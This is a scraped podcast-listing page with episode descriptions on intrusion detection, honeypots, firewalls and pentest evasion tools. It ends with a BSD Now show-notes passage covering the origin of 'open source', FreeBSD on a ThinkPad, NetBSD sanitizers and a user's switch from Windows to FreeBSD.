been delivering expert technology solutions to clients all over the region. It was founded on the concept of combining excellent service with customized, efficient solutions. Innovation and client satisfaction are our main motivators. To provide high-quality service, you need a strong team to support those initiatives. Advanticom believes it has the best technical and supporting team members available in Pittsburgh. These talented experts are empowered to solve the problems and issues. They are constantly reviewing industry trends and concerns, paying attention to threats and new opportunities, honing in on things that can improve the efficiency and business operations of its clients.

Cybersecurity FOREVER
#155: Why are IDS and IPS Critical for Cybersecurity?

Cybersecurity FOREVER

Play Episode Listen Later Jan 2, 2021 13:24


Today I will discuss: 1. What are IDS & IPS? 2. How can IDS/IPS protect for your organization from cyber-attacks? 3. How can a single click generate a long sequence of multiple attacks? 4. What are the opportunities for you? Watch

Cybersecurity FOREVER
#108: How Can IPS & IDS Protect Your Network From Cyber-attacks?

Cybersecurity FOREVER

Play Episode Listen Later Nov 5, 2020 6:49


Today I will discuss: 1. What is the importance of IPS/IDS? 2. Why should you use IPS/IDS in your network? 3. How can IDS/IPS stop many cyber-attacks? Watch

Cybercrimeology
Cybercrime and Deterrence: The Theory behind Stop it!, or else ...

Cybercrimeology

Play Episode Listen Later May 14, 2020 37:08


About the Guest:https://aysps.gsu.edu/profile/david-maimon-2/The Evidence-Based Cybersecurity Research Grouphttps://ebcs.gsu.edu/Papers mentioned in this episode:MAIMON, D., ALPER, M., SOBESTO, B. and CUKIER, M. (2014), RESTRICTIVE DETERRENT EFFECTS OF A WARNING BANNER IN AN ATTACKED COMPUTER SYSTEM. Criminology, 52: 33-59. doi:10.1111/1745-9125.12028Testa, A., Maimon, D., Sobesto, B. and Cukier, M. (2017), Illegal Roaming and File Manipulation on Target Computers. Criminology & Public Policy, 16: 689-726. doi:10.1111/1745-9133.12312David Maimon, Theodore Wilson, Wuling Ren, Tamar Berenblum, On the Relevance of Spatial and Temporal Dimensions in Assessing Computer Susceptibility to System Trespassing Incidents, The British Journal of Criminology, Volume 55, Issue 3, May 2015, Pages 615–634, https://doi.org/10.1093/bjc/azu104Other:Not mentioned at all but this series of white papers compiling evidence for particular defensive tools or strategies is very handy.  Existing Evidence for the Effectiveness of Antivirus in Preventing Cyber Crime Incidents, David MaimonExisting Evidence for the Effectiveness of Firewalls in Preventing Cyber Crime Incidents, David MaimonExisting Evidence for the Effectiveness of Honeypots in Preventing Cyber Crime Incidents, David MaimonExisting Evidence for the Effectiveness of IDS/IPS in Preventing Cyber Crime Incidents, David MaimonExisting Evidence for the Effectiveness of Passwords in Preventing Cyber Crime Incidents, David MaimonExisting Evidence for the Effectiveness of Prompt Vulnerability Patching in Preventing Cyber Crime Incidents, David Maimonhttps://scholarworks.gsu.edu/ebcs_tools/  

The Tech Blog Writer Podcast
1192: How Security Will Change in a Post-COVID-19 World

The Tech Blog Writer Podcast

Play Episode Listen Later May 2, 2020 29:00


Privafy is redefining how to protect Data-in-Motion. Data-in-motion has rapidly become the most vulnerable part of every organization's information and communication architecture. As organizations embrace the openness of the Internet and move data and applications to the cloud, traditional network security technologies and systems are no longer effective in protecting data as it moves between cloud workloads and applications. The Internet is now the new network – affording businesses and employees to easily connect with customers, partners, and each other from any location. But as data traverses between locations – it's increasingly at risk from a multitude of vectors and threat actors. Privafy's security-as-a-service application secures data wherever it travels. The company's cloud-native technology integrates all the functionality of traditional point solutions, such as encryption, firewall, DDoS protection, IDS/IPS and DLP technology, to provide comprehensive data protection as it moves between locations, clouds, mobile devices, and IoT. Guru Pai joins me on the podcast to talk about the blurring of boundaries between home and the workplace and why it is an unsettling factor for many enterprises. We also discuss why WFH employee solutions often don't have the same protection/monitoring as in the home office-- as result compromises away from work premises will increase --explain some examples like an attacker tailgating into the enterprise, etc. Guru also provides his five predictions of why and how digitalization and security will change in a post-COVID-19 world. Today's guest is an industry veteran with over 30 years of experience leading and scaling high-performance organizations ranging from startups to large global firms. A results-oriented executive, Guru co-founded Privafy with a mission to fix the currently flawed approach to securing Data-in-Motion. Before Privafy, Guru served in senior roles at Verizon Communications, where he was responsible for overseeing the products, services, and operations for all of Verizon's businesses. Before Verizon, he served in varying senior executive roles at companies such as Sonus Networks, AT&T/Bell Labs and Motorola. Guru is also a successful entrepreneur, having founded technology startups within the networking and big data and analytics industries.

Collective Defense
Going After New Threats, Binaries, and Malware with Peter Rydzynski

Collective Defense

Play Episode Listen Later Apr 6, 2020 35:33


In this episode of the Collective Defense Podcast we are jumping into honeypots, honeynets, and how emerging threats can be proactively detected with Peter Rydzynski. On the new front we analyzed a number of stories including the most recent Marriott breach, zoombombs and WarDialz, and of course more insecure Wordpress plugins. Software Mentioned in this episode: SELKS https://www.stamus-networks.com/scirius-open-source (https://www.stamus-networks.com/scirius-open-source) Both live and installable Network Security Management ISO based on Debian Complete Suricata IDS/IPS ecosystem with its own graphic rule manager From start to analysis of IDS/IPS and NSM events in 30 sec Major components: Suricata Elasticsearch Logstash Kibana Moloch Scirius Community Edition EveBox Cowrie https://github.com/cowrie/cowrie (https://github.com/cowrie/cowrie) Cowrie is a medium to high interaction SSH and Telnet honeypot designed to log brute force attacks and the shell interaction performed by the attacker. In medium interaction mode (shell) it emulates a UNIX system in Python, in high interaction mode (proxy) it functions as an SSH and telnet proxy to observe attacker behavior to another system. Cowrie is maintained by Michel Oosterhof. Dionaea https://github.com/DinoTools/dionaea (https://github.com/DinoTools/dionaea) This low-interaction honeypot written in C and Python uses the Libemu library to emulate the execution of Intel x86 instructions and detect shellcodes. In addition, we can say it’s a multi-protocol honeypot that offers support for protocols such as FTP, HTTP, Memcache, MSSQL, MySQL, SMB, TFTP, etc. Protocols blackhole epmap ftp http memcache mirror mqtt mssql mysql pptp sip smb tftp upnp Logging fail2ban hpfeeds log_json log_sqlit Netcat http://netcat.sourceforge.net/ (http://netcat.sourceforge.net/) Netcat is a featured networking utility which reads and writes data across network connections, using the TCP/IP protocol. It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities. It provides access to the following main features: Outbound and inbound connections, TCP or UDP, to or from any ports. Featured tunneling mode which allows also special tunneling such as UDP to TCP, with the possibility of specifying all network parameters (source port/interface, listening port/interface, and the remote host allowed to connect to the tunnel. Built-in port-scanning capabilities, with randomizer. Advanced usage options, such as buffered send-mode (one line every N seconds), and hexdump (to stderr or to a specified file) of trasmitted and received data. Optional RFC854 telnet codes parser and responder. Modern Honey Network https://github.com/pwnlandia/mhn (https://github.com/pwnlandia/mhn) MHN is a centralized server for management and data collection of honeypots. MHN allows you to deploy sensors quickly and to collect data immediately, viewable from a neat web interface. Honeypot deploy scripts include several common honeypot technologies, including Snort, Cowrie, Dionaea, and glastopf, among others. Features MHN is a Flask application that exposes an HTTP API that honeypots can use to: Download a deploy script Connect and register Download snort rules Send intrusion detection logs It also allows system administrators to: View a list of new attacks Manage snort rules: enable, disable, download

Virtual Stack
27 - Virtual Stack - VMware NSX Distributed IDS/IPS

Virtual Stack

Play Episode Listen Later Dec 2, 2019 41:30


On the 27th episode of the show, I’m joined by Stijn Vanveerdeghem, Senior Technical Product Manager at VMware.    Distributed IPS/IDS (Intrusion Prevention and Detection System) on NSX-T was one of the biggest announcements at VMworld 2019 Europe. Stijn is the Technical Product Manager behind this feature and he took the time to explain us what VMware is bringing to the security market and what are the distinctive benefits that customers can gain from using this feature.   You can reach out to Stijn via LinkedIn (https://www.linkedin.com/in/stijnvanv/).    Virtual Stack is available on all major apps: Apple Podcast, Spotify, Google Podcast, Stitcher and more. Hope you enjoy the show. As usual, feel free to share your feedback via Twitter (@emregirici), LinkedIn or virtualstack.tech.   Show notes: 02:00 - Intro 04:45 - What did VMware announce in VMworld 2019 Europe? 07:50 - What is IPS/IDS and what is the difference between IDS/IPS and a Firewall and NGFW (Next-gen FW) 15:00 - Can you talk about the use cases for Distributed IDS? 21:00 - What additional benefits does VMware bring to the customer? 29:15 - Can you tell us a bit more about the Architecture? 35:30 - What are the NSX-T IPS/IDS signatures based on? 37:15 - What about the general availability? 38:30 - Closing notes Links: VMworld 2019 Europe session: What's New with NSX-T Micro-Segmentation (SAI2565BE)(IPS/IDS is covered at the end) Official Product Page  VMware Blog about the feature announcement 

Cyber Security Grey Beard
Ep. 7 - Cyber Security Job Technologies: WAF, IAM, Forensics, IDS/IPS

Cyber Security Grey Beard

Play Episode Listen Later Sep 16, 2019 12:00


Cyber Security Job information for students, early professionals, and experienced staff retraining or switching roles. Herein I cover what the following technologies are and what professionals use them: Web Application Firewall (WAF), Identity and Access Management (IAM), Forensics, Intrusion Detection System (IDS) and Intrusion Prevention System (IPS). Cyber Security Job guidance for students, early professionals and experienced individuals looking for a new profession in Cyber Security or retraining.

Przygody Przedsiębiorców
Jakie BŁĘDY Popełniasz W Internecie Piotr Konieczny. Niebezpiecznik. (Infoshare 2019)

Przygody Przedsiębiorców

Play Episode Listen Later Jun 4, 2019 23:20


Drugim gościem bonusowej serii związanej z naszą współpracą z Infoshare jest Piotr Konieczny. Chief Information Security Officer oraz założyciel portalu niebezpiecznik.pl na którym poruszane są tematy dotyczące szeroko rozumianego bezpieczeństwa cyfrowego. Konsultuje, doradza, wdraża i zarządza appliance'ami do ochrony i monitoringu sieci firmowych (Firewalle, IDS/IPS, DLP, WAF, Webfiltering). Zajmuje się także informatyką śledczą (lub jak kto woli kryminalistyką informatyczną), czyli analizą włamań i odzyskiwaniem danych (ang. computer forensic).

Secure Digital Life (Audio)
Firewalls - Secure Digital Life #65

Secure Digital Life (Audio)

Play Episode Listen Later May 25, 2018 33:41


This week, Doug and Russ talk about Firewalls! These tools can actually deconstruct the frame into the data and evaluate many things including signature analysis, IDS/IPS, and other types of threat analysis. They discuss WAF, Packet Filtering, Ports, OWASP, and more on this episode of Secure Digital Life!   Full Show Notes: https://wiki.securityweekly.com/SDL_Episode65   Visit our website: http://securedigitallife.com

Secure Digital Life (Video)
Firewalls - Secure Digital Life #65

Secure Digital Life (Video)

Play Episode Listen Later May 22, 2018 33:45


This week, Doug and Russ talk about Firewalls! These tools can actually deconstruct the frame into the data and evaluate many things including signature analysis, IDS/IPS, and other types of threat analysis. They discuss WAF, Packet Filtering, Ports, OWASP, and more on this episode of Secure Digital Life! Full Show Notes: https://wiki.securityweekly.com/SDL_Episode65 Visit our website: http://securedigitallife.com Follow us on Twitter: https://www.twitter.com/securediglife

Tradecraft Security Weekly (Audio)
Evading Network-Based Detection Mechanisms - Tradecraft Security Weekly #24

Tradecraft Security Weekly (Audio)

Play Episode Listen Later Mar 29, 2018 19:41


In this episode of Tradecraft Security Weekly hosts Beau Bullock (@dafthack) and Mike Felch (@ustayready) discuss methods for evading network-based detection mechanisms. Many commercial IDS/IPS devices do a pretty decent job of detecting standard pentesting tools like Nmap when no evasion options are used. Additionally, companies are doing a better job at detecting and blocking IP addresses performing password attacks. Proxycannon is a tool that allows pentesters to spin up multiple servers to proxy attempts through to bypass some of these detection mechanisms. Links: Nmap Evasion Options - https://nmap.org/book/man-bypass-firewalls-ids.html ProxyCannon - https://www.shellntel.com/blog/2016/1/14/update-to-proxycannon

Tradecraft Security Weekly (Video)
Evading Network-Based Detection Mechanisms - Tradecraft Security Weekly #24

Tradecraft Security Weekly (Video)

Play Episode Listen Later Mar 29, 2018 19:41


In this episode of Tradecraft Security Weekly hosts Beau Bullock (@dafthack) and Mike Felch (@ustayready) discuss methods for evading network-based detection mechanisms. Many commercial IDS/IPS devices do a pretty decent job of detecting standard pentesting tools like Nmap when no evasion options are used. Additionally, companies are doing a better job at detecting and blocking IP addresses performing password attacks. Proxycannon is a tool that allows pentesters to spin up multiple servers to proxy attempts through to bypass some of these detection mechanisms. Links: Nmap Evasion Options - https://nmap.org/book/man-bypass-firewalls-ids.html ProxyCannon - https://www.shellntel.com/blog/2016/1/14/update-to-proxycannon

BSD Now
235: I C you BSD

BSD Now

Play Episode Listen Later Feb 28, 2018 125:28


How the term open source was created, running FreeBSD on ThinkPad T530, Moving away from Windows, Unknown Giants, as well as OpenBSD and FreeDOS. This episode was brought to you by Headlines How I coined the term 'open source' (https://opensource.com/article/18/2/coining-term-open-source-software) In a few days, on February 3, the 20th anniversary of the introduction of the term "open source software" is upon us. As open source software grows in popularity and powers some of the most robust and important innovations of our time, we reflect on its rise to prominence. I am the originator of the term "open source software" and came up with it while executive director at Foresight Institute. Not a software developer like the rest, I thank Linux programmer Todd Anderson for supporting the term and proposing it to the group. This is my account of how I came up with it, how it was proposed, and the subsequent reactions. Of course, there are a number of accounts of the coining of the term, for example by Eric Raymond and Richard Stallman, yet this is mine, written on January 2, 2006. It has never been published, until today. The introduction of the term "open source software" was a deliberate effort to make this field of endeavor more understandable to newcomers and to business, which was viewed as necessary to its spread to a broader community of users. The problem with the main earlier label, "free software," was not its political connotations, but that—to newcomers—its seeming focus on price is distracting. A term was needed that focuses on the key issue of source code and that does not immediately confuse those new to the concept. The first term that came along at the right time and fulfilled these requirements was rapidly adopted: open source. This term had long been used in an "intelligence" (i.e., spying) context, but to my knowledge, use of the term with respect to software prior to 1998 has not been confirmed. The account below describes how the term open source software caught on and became the name of both an industry and a movement. Meetings on computer security In late 1997, weekly meetings were being held at Foresight Institute to discuss computer security. Foresight is a nonprofit think tank focused on nanotechnology and artificial intelligence, and software security is regarded as central to the reliability and security of both. We had identified free software as a promising approach to improving software security and reliability and were looking for ways to promote it. Interest in free software was starting to grow outside the programming community, and it was increasingly clear that an opportunity was coming to change the world. However, just how to do this was unclear, and we were groping for strategies. At these meetings, we discussed the need for a new term due to the confusion factor. The argument was as follows: those new to the term "free software" assume it is referring to the price. Oldtimers must then launch into an explanation, usually given as follows: "We mean free as in freedom, not free as in beer." At this point, a discussion on software has turned into one about the price of an alcoholic beverage. The problem was not that explaining the meaning is impossible—the problem was that the name for an important idea should not be so confusing to newcomers. A clearer term was needed. No political issues were raised regarding the free software term; the issue was its lack of clarity to those new to the concept. Releasing Netscape On February 2, 1998, Eric Raymond arrived on a visit to work with Netscape on the plan to release the browser code under a free-software-style license. We held a meeting that night at Foresight's office in Los Altos to strategize and refine our message. In addition to Eric and me, active participants included Brian Behlendorf, Michael Tiemann, Todd Anderson, Mark S. Miller, and Ka-Ping Yee. But at that meeting, the field was still described as free software or, by Brian, "source code available" software. While in town, Eric used Foresight as a base of operations. At one point during his visit, he was called to the phone to talk with a couple of Netscape legal and/or marketing staff. When he was finished, I asked to be put on the phone with them—one man and one woman, perhaps Mitchell Baker—so I could bring up the need for a new term. They agreed in principle immediately, but no specific term was agreed upon. Between meetings that week, I was still focused on the need for a better name and came up with the term "open source software." While not ideal, it struck me as good enough. I ran it by at least four others: Eric Drexler, Mark Miller, and Todd Anderson liked it, while a friend in marketing and public relations felt the term "open" had been overused and abused and believed we could do better. He was right in theory; however, I didn't have a better idea, so I thought I would try to go ahead and introduce it. In hindsight, I should have simply proposed it to Eric Raymond, but I didn't know him well at the time, so I took an indirect strategy instead. Todd had agreed strongly about the need for a new term and offered to assist in getting the term introduced. This was helpful because, as a non-programmer, my influence within the free software community was weak. My work in nanotechnology education at Foresight was a plus, but not enough for me to be taken very seriously on free software questions. As a Linux programmer, Todd would be listened to more closely. The key meeting Later that week, on February 5, 1998, a group was assembled at VA Research to brainstorm on strategy. Attending—in addition to Eric Raymond, Todd, and me—were Larry Augustin, Sam Ockman, and attending by phone, Jon "maddog" Hall. The primary topic was promotion strategy, especially which companies to approach. I said little, but was looking for an opportunity to introduce the proposed term. I felt that it wouldn't work for me to just blurt out, "All you technical people should start using my new term." Most of those attending didn't know me, and for all I knew, they might not even agree that a new term was greatly needed, or even somewhat desirable. Fortunately, Todd was on the ball. Instead of making an assertion that the community should use this specific new term, he did something less directive—a smart thing to do with this community of strong-willed individuals. He simply used the term in a sentence on another topic—just dropped it into the conversation to see what happened. I went on alert, hoping for a response, but there was none at first. The discussion continued on the original topic. It seemed only he and I had noticed the usage. Not so—memetic evolution was in action. A few minutes later, one of the others used the term, evidently without noticing, still discussing a topic other than terminology. Todd and I looked at each other out of the corners of our eyes to check: yes, we had both noticed what happened. I was excited—it might work! But I kept quiet: I still had low status in this group. Probably some were wondering why Eric had invited me at all. Toward the end of the meeting, the question of terminology was brought up explicitly, probably by Todd or Eric. Maddog mentioned "freely distributable" as an earlier term, and "cooperatively developed" as a newer term. Eric listed "free software," "open source," and "sourceware" as the main options. Todd advocated the "open source" model, and Eric endorsed this. I didn't say much, letting Todd and Eric pull the (loose, informal) consensus together around the open source name. It was clear that to most of those at the meeting, the name change was not the most important thing discussed there; a relatively minor issue. Only about 10% of my notes from this meeting are on the terminology question. But I was elated. These were some key leaders in the community, and they liked the new name, or at least didn't object. This was a very good sign. There was probably not much more I could do to help; Eric Raymond was far better positioned to spread the new meme, and he did. Bruce Perens signed on to the effort immediately, helping set up Opensource.org and playing a key role in spreading the new term. For the name to succeed, it was necessary, or at least highly desirable, that Tim O'Reilly agree and actively use it in his many projects on behalf of the community. Also helpful would be use of the term in the upcoming official release of the Netscape Navigator code. By late February, both O'Reilly & Associates and Netscape had started to use the term. Getting the name out After this, there was a period during which the term was promoted by Eric Raymond to the media, by Tim O'Reilly to business, and by both to the programming community. It seemed to spread very quickly. On April 7, 1998, Tim O'Reilly held a meeting of key leaders in the field. Announced in advance as the first "Freeware Summit," by April 14 it was referred to as the first "Open Source Summit." These months were extremely exciting for open source. Every week, it seemed, a new company announced plans to participate. Reading Slashdot became a necessity, even for those like me who were only peripherally involved. I strongly believe that the new term was helpful in enabling this rapid spread into business, which then enabled wider use by the public. A quick Google search indicates that "open source" appears more often than "free software," but there still is substantial use of the free software term, which remains useful and should be included when communicating with audiences who prefer it. A happy twinge When an early account of the terminology change written by Eric Raymond was posted on the Open Source Initiative website, I was listed as being at the VA brainstorming meeting, but not as the originator of the term. This was my own fault; I had neglected to tell Eric the details. My impulse was to let it pass and stay in the background, but Todd felt otherwise. He suggested to me that one day I would be glad to be known as the person who coined the name "open source software." He explained the situation to Eric, who promptly updated his site. Coming up with a phrase is a small contribution, but I admit to being grateful to those who remember to credit me with it. Every time I hear it, which is very often now, it gives me a little happy twinge. The big credit for persuading the community goes to Eric Raymond and Tim O'Reilly, who made it happen. Thanks to them for crediting me, and to Todd Anderson for his role throughout. The above is not a complete account of open source history; apologies to the many key players whose names do not appear. Those seeking a more complete account should refer to the links in this article and elsewhere on the net. FreeBSD on a Laptop - A guide to a fully functional installation of FreeBSD on a ThinkPad T530 (https://www.c0ffee.net/blog/freebsd-on-a-laptop) As I stated my previous post, I recently dug up my old ThinkPad T530 after the embarrassing stream of OS X security bugs this month. Although this ThinkPad ran Gentoo faithfully during my time in graduate school at Clemson, these days I'd much rather spend time my wife and baby than fighting with emerge and USE flags. FreeBSD has always been my OS of choice, and laptop support seems to be much better than it was a few years ago. In this guide, I'll show you the tweaks I made to wrestle FreeBSD into a decent experience on a laptop. Unlike my usual posts, this time I'm going to assume you're already pretty familiar with FreeBSD. If you're a layman looking for your first BSD-based desktop, I highly recommend checking out TrueOS (previously PC-BSD): they've basically taken FreeBSD and packaged it with all the latest drivers, along with a user-friendly installer and custom desktop environment out of the box. TrueOS is an awesome project–the only reason I don't use it is because I'm old, grumpy, and persnickety about having my operating system just so. Anyway, if you'd still like to take the plunge, read on. Keep in mind, I'm using a ThinkPad T530, but other ThinkPads of the same generation should be similarly compatible. Here's what you'll get: Decent battery life (8-9 hours with a new 9-cell battery) UEFI boot and full-disk encryption WiFi (Intel Ultimate-N 6300) Ethernet (Intel PRO/1000) Screen brightness adjustment Suspend/Resume on lid close (make sure to disable TPM in BIOS) Audio (Realtek ALC269 HDA, speakers and headphone jack) Keyboard multimedia buttons Touchpad/Trackpoint Graphics Acceleration (with integrated Intel graphics, NVIDIA card disabled in BIOS) What I haven't tested yet: Bluetooth Webcam Fingerprint reader SD Card slot Installation Power Saving Tweaks for Desktop Use X11 Fonts Login Manager: SLiM Desktop Environment: i3 Applications The LLVM Sanitizers stage accomplished (https://blog.netbsd.org/tnf/entry/the_llvm_sanitizers_stage_accomplished) I've managed to get the Memory Sanitizer to work for the elementary base system utilities, like ps(1), awk(1) and ksh(1). This means that the toolchain is ready for tests and improvements. I've iterated over the basesystem utilities and I looked for bugs, both in programs and in sanitizers. The number of detected bugs in the userland programs was low, there merely was one reading of an uninitialized variable in ps(1). A prebuilt LLVM toolchain I've prepared a prebuilt toolchain with Clang, LLVM, LLDB and compiler-rt for NetBSD/amd64. I prepared the toolchain on 8.99.12, however I have received reports that it works on other older releases. Link: llvm-clang-compilerrt-lldb-7.0.0beta_2018-01-24.tar.bz2 The archive has to be untarballed to /usr/local (however it might work to some extent in other paths). This toolchain contains a prebuilt tree of the LLVM projects from a snapshot of 7.0.0(svn). It is a pristine snapshot of HEAD with patches from pkgsrc-wip for llvm, clang, compiler-rt and lldb. Sanitizers Notable changes in sanitizers, all of them are in the context of NetBSD support. Added fstat(2) MSan interceptor. Support for kvm(3) interceptors in the common sanitizer code. Added devname(3) and devname_r(3) interceptors to the common sanitizer code. Added sysctl(3) familty of functions interceptors in the common sanitizer code. Added strlcpy(3)/strlcat(3) interceptors in the common sanitizer code. Added getgrouplist(3)/getgroupmembership(3) interceptors in the common sanitizer code. Correct ctype(3) interceptors in a code using Native Language Support. Correct tzset(3) interceptor in MSan. Correct localtime(3) interceptor in the common sanitizer code. Added paccept(2) interceptor to the common sanitizer code. Added access(2) and faccessat(2) interceptors to the common sanitizer code. Added acct(2) interceptor to the common sanitizer code. Added accept4(2) interceptor to the common sanitizer code. Added fgetln(3) interceptor to the common sanitizer code. Added interceptors for the pwcache(3)-style functions in the common sanitizer code. Added interceptors for the getprotoent(3)-style functions in the common sanitizer code. Added interceptors for the getnetent(3)-style functions in the common sanitizer code. Added interceptors for the fts(3)-style functions in the common sanitizer code. Added lstat(3) interceptor in MSan. Added strftime(3) interceptor in the common sanitizer code. Added strmode(3) interceptor in the common sanitizer code. Added interceptors for the regex(3)-style functions in the common sanitizer code. Disabled unwanted interceptor __sigsetjmp in TSan. Base system changes I've tidied up inclusion of the internal namespace.h header in libc. This has hidden the usage of public global symbol names of: strlcat -> _strlcat sysconf -> __sysconf closedir -> _closedir fparseln -> _fparseln kill -> _kill mkstemp -> _mkstemp reallocarr -> _reallocarr strcasecmp -> _strcasecmp strncasecmp -> _strncasecmp strptime -> _strptime strtok_r -> _strtok_r sysctl -> _sysctl dlopen -> __dlopen dlclose -> __dlclose dlsym -> __dlsym strlcpy -> _strlcpy fdopen -> _fdopen mmap -> _mmap strdup -> _strdup The purpose of these changes was to stop triggering interceptors recursively. Such interceptors lead to sanitization of internals of unprepared (not recompiled with sanitizers) prebuilt code. It's not trivial to sanitize libc's internals and the sanitizers are not designed to do so. This means that they are not a full replacement of Valgrind-like software, but a a supplement in the developer toolbox. Valgrind translates native code to a bytecode virtual machine, while sanitizers are designed to work with interceptors inside the pristine elementary libraries (libc, libm, librt, libpthread) and embed functionality into the executable's code. I've also reverted the vadvise(2) syscall removal, from the previous month. This caused a regression in legacy code recompiled against still supported compat layers. Newly compiled code will use a libc's stub of vadvise(2). I've also prepared a patch installing dedicated headers for sanitizers along with the base system GCC. It's still discussed and should land the sources soon. Future directions and goals Possible paths in random order: In the quartet of UBSan (Undefined Behavior Sanitizer), ASan (Address Sanitizer), TSan (Thread Sanitizer), MSan (Memory Sanitizer) we need to add the fifth basic sanitizer: LSan (Leak Sanitizer). The Leak Sanitizer (detector of memory leaks) demands a stable ptrace(2) interface for processes with multiple threads (unless we want to build a custom kernel interface). Integrate the sanitizers with the userland framework in order to ship with the native toolchain to users. Port sanitizers from LLVM to GCC. Allow to sanitize programs linked against userland libraries other than libc, librt, libm and libpthread; by a global option (like MKSANITIZER) producing a userland that is partially prebuilt with a desired sanitizer. This is required to run e.g. MSanitized programs against editline(3). So far, there is no Operating System distribution in existence with a native integration with sanitizers. There are 3rd party scripts for certain OSes to build a stack of software dependencies in order to validate a piece of software. Execute ATF tests with the userland rebuilt with supported flavors of sanitizers and catch regressions. Finish porting of modern linkers designed for large C++ software, such as GNU GOLD and LLVM LLD. Today the bottleneck with building the LLVM toolchain is a suboptimal linker GNU ld(1). I've decided to not open new battlefields and return now to porting LLDB and fixing ptrace(2). Plan for the next milestone Keep upstreaming a pile of local compiler-rt patches. Restore the LLDB support for traced programs with a single thread. Interview - Goran Mekic - meka@tilda.center (mailto:meka@tilda.center) / @meka_floss (https://twitter.com/meka_floss) CBSD website (https://bsdstore.ru) Jail and VM Manager *** News Roundup Finally Moving Away From Windows (https://www.manios.ca/blog/2018/01/finally-moving-away-from-windows/) Broken Window Thanks to a combination of some really impressive malware, bad clicking, and poor website choices, I had to blow away my Windows 10 installation. Not that it was Window's fault, but a piece of malware had infected my computer when I tried to download a long lost driver for an even longer lost RAID card for a server. A word of advice – the download you're looking for is never on an ad-infested forum in another language. In any case, I had been meaning to switch away from Windows soon. I didn't have my entire plan ready, but now was as good a time as any. My line of work requires me to maintain some form of Windows installation, so I decided to keep it in a VM rather than dual booting as I was developing code and not running any high-end visual stuff like games. My first thought was to install Arch or Gentoo Linux, but the last time I attempted a Gentoo installation it left me bootless. Not that there is anything wrong with Gentoo, it was probably my fault, but I like the idea of some sort of installer so I looked at rock-solid Debian. My dad had installed Debian on his sweet new cutting-edge Lenovo laptop he received recently from work. He often raves about his cool scripts and much more effective customized experience, but often complains about his hybrid GPU support as he has an Intel/Nvidia hybrid display adapter (he has finally resolved it and now boasts his 6 connected displays). I didn't want to install Windows again, but something didn't feel right about installing some flavour of Linux. Back at home I have a small collection of FreeBSD servers running in all sorts of jails and other physical hardware, with the exception of one Debian server which I had the hardest time dealing with (it would be FreeBSD too if 802.11ac support was there as it is acting as my WiFi/gateway/IDS/IPS). I loved my FreeBSD servers, and yes I will write posts about each one soon enough. I wanted that cleanliness and familiarity on my desktop as well (I really love the ports collection!). It's settled – I will run FreeBSD on my laptop. This also created a new rivalry with my father, which is not a bad thing either. Playing Devil's Advocate The first thing I needed to do was backup my Windows data. This was easy enough, just run a Windows Image Backup and it will- wait, what? Why isn't this working? I didn't want to fiddle with this too long because I didn't actually need an image just the data. I ended up just copying over the files to an external hard disk. Once that was done, I downloaded and verified the latest FreeBSD 11.1 RELEASE memstick image and flashed it to my trusty 8GB Verbatim USB stick. I've had this thing since 2007, it works great for being my re-writable “CD”. I booted it up and started the installation. I knew this installer pretty well as I had test-installed FreeBSD and OpenBSD in VMs when I was researching a Unix style replacement OS last year. In any case, I left most of the defaults (I didn't want to play with custom kernels right now) and I selected all packages. This downloaded them from the FreeBSD FTP server as I only had the memstick image. The installer finished and I was off to my first boot. Great! so far so good. FreeBSD loaded up and I did a ‘pkg upgrade' just to make sure that everything was up to date. Alright, time to get down to business. I needed nano. I just can't use vi, or just not yet. I don't care about being a vi-wizard, that's just too much effort for me. Anyway, just a ‘pkg install nano' and I had my editor. Next was obvious, I needed x11. XFCE was common, and there were plenty of tutorials out there. I wont bore you with those details, but it went something like ‘pkg install xfce' and I got all the dependencies. Don't forget to install SLiM to make it seamless. There are some configs in the .login I think. SLiM needs to be called once the boot drops you to the login so that you get SLiM's nice GUI login instead of the CLI login screen. Then SLiM passes you off to XFCE. I think I followed this and this. Awesome. Now that x11 is working, it's time to get all of my apps from Windows. Obviously, I can't get everything (ie. Visual Studio, Office). But in my Windows installation, I had chosen many open-source or cross-compiled apps as they either worked better or so that I was ready to move away from Windows at a moments notice. ‘pkg install firefox thunderbird hexchat pidgin gpa keepass owncloud-client transmission-qt5 veracrypt openvpn' were some immediate picks. There are a lot more that I downloaded later, but these are a few I use everyday. My laptop also has the same hybrid display adapter config that my dad's has, but I chose to only run Intel graphics, so dual screens are no problem for me. I'll add Nvidia support later, but it's not a priority. After I had imported my private keys and loaded my firefox and thunderbird settings, I wanted to get my Windows VM running right away as I was burning productive days at work fiddling with this. I had only two virtualisation options; qemu/kvm and bhyve. qemu/kvm wasn't available in pkg, and looked real dirty to compile, from FreeBSD's point of view. My dad is using qemu/kvm with virt-manager to manage all of his Windows/Unix VMs alike. I wanted that experience, but I also wanted packages that could be updated and I didn't want to mess up a compile. bhyve was a better choice. It was built-in, it was more compatible with Windows (from what I read), and this is a great step-by-step article for Windows 10 on FreeBSD 11 bhyve! I had already tried to get virt-manager to work with bhyve with no luck. I don't think libvirt connects with bhyve completely, or maybe my config is wrong. But I didn't have time to fiddle with it. I managed it all through command lines and that has worked perfectly so far. Well sorta, there was an issue installing SQL Server, and only SQL Server, on my Windows VM. This was due to a missing ‘sectorsize=512' setting on the disk parameter on the bhyve command line. That was only found after A LOT of digging because the SQL Server install didn't log the error properly. I eventually found out that SQL Server only likes one sector size of disks for the install and my virtual disk geometry was incorrect. Apps Apps Apps I installed Windows 10 on my bhyve VM and I got that all setup with the apps I needed for work. Mostly Office, Visual Studio, and vSphere for managing our server farm. Plus all of the annoying 3rd party VPN software (I'm looking at you Dell and Cisco). Alright, with the Windows VM done, I can now work at work and finish FreeBSD mostly during the nights. I still needed my remote files (I setup an ownCloud instance on a FreeNAS jail at home) so I setup the client. Now, normally on Windows I would come to work and connect to my home network using OpenVPN (again, I have a OpenVPN FreeNAS jail at home) and the ownCloud desktop would be able to handle changing DNS destination IPs Not on FreeBSD (and Linux too?). I ended up just configuring the ownCloud client to just connect to the home LAN IP for the ownCloud server and always connecting the OpenVPN to sync things. It kinda sucks, but at least it works. I left that running at home overnight to get a full sync (~130GB cloud sync, another reason I use it over Google or Microsoft). Once that was done I moved onto the fstab as I had another 1TB SSD in my laptop with other files. I messed around with fstab and my NFS shares to my FreeNAS at home, but took them out as they made the boot time so long when I wasn't at home. I would only mount them when my OpenVPN connected or manually. I really wanted to install SpaceFM, but it's only available as a package on Debian and their non-package install script doesn't work on FreeBSD (packages are named differently). I tried doing it manually, but it was too much 